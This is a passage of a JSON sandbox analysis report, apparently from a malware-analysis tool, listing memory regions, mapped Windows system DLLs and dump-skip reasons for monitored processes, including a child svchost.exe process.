"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1966014464, "type": "region", "version": 1 }, "end_va": 1966079999, "entry_point": 1966014464, "filename": "\\Windows\\SysWOW64\\NapiNSP.dll", "id": "region_4229", "name": "napinsp.dll", "norm_filename": "c:\\windows\\syswow64\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1966014464, "timestamp": "00:07:38.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130255872, "type": "region", "version": 1 }, "end_va": 2130268159, "entry_point": 0, "filename": null, "id": "region_4230", "name": "private_0x000000007ef92000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130255872, "timestamp": "00:07:38.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1965883392, "type": "region", "version": 1 }, "end_va": 1965957119, "entry_point": 1965883392, "filename": "\\Windows\\SysWOW64\\pnrpnsp.dll", "id": "region_4231", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\syswow64\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1965883392, "timestamp": "00:07:38.390", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1965621248, "type": "region", "version": 1 }, "end_va": 1965867007, "entry_point": 1965621248, "filename": "\\Windows\\SysWOW64\\mswsock.dll", "id": "region_4232", "name": "mswsock.dll", "norm_filename": "c:\\windows\\syswow64\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1965621248, "timestamp": "00:07:38.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1965555712, "type": "region", "version": 1 }, "end_va": 1965588479, "entry_point": 1965555712, "filename": "\\Windows\\SysWOW64\\winrnr.dll", "id": "region_4233", "name": "winrnr.dll", "norm_filename": "c:\\windows\\syswow64\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1965555712, "timestamp": "00:07:38.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1965490176, "type": "region", "version": 1 }, "end_va": 1965510655, "entry_point": 1965490176, "filename": "\\Windows\\SysWOW64\\WSHTCPIP.DLL", "id": "region_4234", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\syswow64\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1965490176, "timestamp": "00:07:38.400", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", "filename": "c:\\windows\\syswow64\\svchost.exe", "id": "proc_25", "image_name": "svchost.exe", "monitor_reason": "child_process", "monitored_id": 25, "origin_monitor_id": 22, "ref_parent_process": { "ref_id": "proc_22", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4090", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4091", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4092", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4093", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4094", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 573439, "entry_point": 0, "filename": null, "id": "region_4095", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_4096", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_4097", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4882431, "entry_point": 4849664, "filename": "\\Windows\\SysWOW64\\svchost.exe", "id": "region_4098", "name": "svchost.exe", "norm_filename": "c:\\windows\\syswow64\\svchost.exe", "region_type": "memory_mapped_file", "start_va": 4849664, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007826432, "type": "region", "version": 1 }, "end_va": 2009567231, "entry_point": 2007826432, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4099", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007826432, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009792512, "type": "region", "version": 1 }, "end_va": 2011365375, "entry_point": 2009792512, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4100", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009792512, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4101", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4102", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4103", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4104", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4105", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4106", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4107", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:07:38.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_4136", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:07:38.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_4137", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:07:38.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4718591, "entry_point": 0, "filename": null, "id": "region_4138", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:07:38.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1950154752, "type": "region", "version": 1 }, "end_va": 1950187519, "entry_point": 1950154752, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4139", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1950154752, "timestamp": "00:07:38.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1950220288, "type": "region", "version": 1 }, "end_va": 1950597119, "entry_point": 1950220288, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4140", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1950220288, "timestamp": "00:07:38.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1950613504, "type": "region", "version": 1 }, "end_va": 1950871551, "entry_point": 1950613504, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4141", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1950613504, "timestamp": "00:07:38.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4142", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:07:38.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4143", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2191359, "entry_point": 1769472, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4144", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1769472, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_4145", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 7536639, "entry_point": 0, "filename": null, "id": "region_4146", "name": "private_0x0000000000630000", "norm_filename": null, "region_type": "private_memory", "start_va": 6488064, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971322880, "type": "region", "version": 1 }, "end_va": 1971372031, "entry_point": 1971322880, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4147", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1971322880, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1971781631, "entry_point": 1971388416, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4148", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973157888, "type": "region", "version": 1 }, "end_va": 1974271999, "entry_point": 1973157888, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4149", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973157888, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1978073088, "type": "region", "version": 1 }, "end_va": 1978777599, "entry_point": 1978073088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4150", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1978073088, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986551807, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4151", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1987903488, "type": "region", "version": 1 }, "end_va": 1988005887, "entry_point": 1987903488, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4152", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1987903488, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989083135, "entry_point": 1988100096, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4153", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005598208, "type": "region", "version": 1 }, "end_va": 2006622207, "entry_point": 0, "filename": null, "id": "region_4154", "name": "private_0x00000000778b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005598208, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006646784, "type": "region", "version": 1 }, "end_va": 2007822335, "entry_point": 0, "filename": null, "id": "region_4155", "name": "private_0x00000000779b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006646784, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4156", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4157", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:07:38.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1972109312, "type": "region", "version": 1 }, "end_va": 1973157887, "entry_point": 1972109312, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4158", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1972109312, "timestamp": "00:07:38.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989476352, "type": "region", "version": 1 }, "end_va": 1990066175, "entry_point": 1989476352, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4159", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989476352, "timestamp": "00:07:38.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989124095, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4160", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:07:38.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1980825600, "type": "region", "version": 1 }, "end_va": 1981468671, "entry_point": 1980825600, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4161", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1980825600, "timestamp": "00:07:38.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2004746239, "entry_point": 2004090880, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4162", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:07:38.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 253951, "entry_point": 131072, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4163", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 131072, "timestamp": "00:07:38.278", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 9142271, "entry_point": 0, "filename": null, "id": "region_4164", "name": "pagefile_0x0000000000730000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7536640, "timestamp": "00:07:38.278", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1980432384, "type": "region", "version": 1 }, "end_va": 1980825599, "entry_point": 1980432384, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4166", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1980432384, "timestamp": "00:07:38.280", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1985413120, "type": "region", "version": 1 }, "end_va": 1986248703, "entry_point": 1985413120, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4167", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1985413120, "timestamp": "00:07:38.280", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 10751999, "entry_point": 0, "filename": null, "id": "region_4168", "name": "pagefile_0x00000000008c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9175040, "timestamp": "00:07:38.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10813440, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_4169", "name": "pagefile_0x0000000000a50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10813440, "timestamp": "00:07:38.282", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_4174", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:07:38.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4175", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:07:38.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_4176", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:07:38.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_4177", "name": 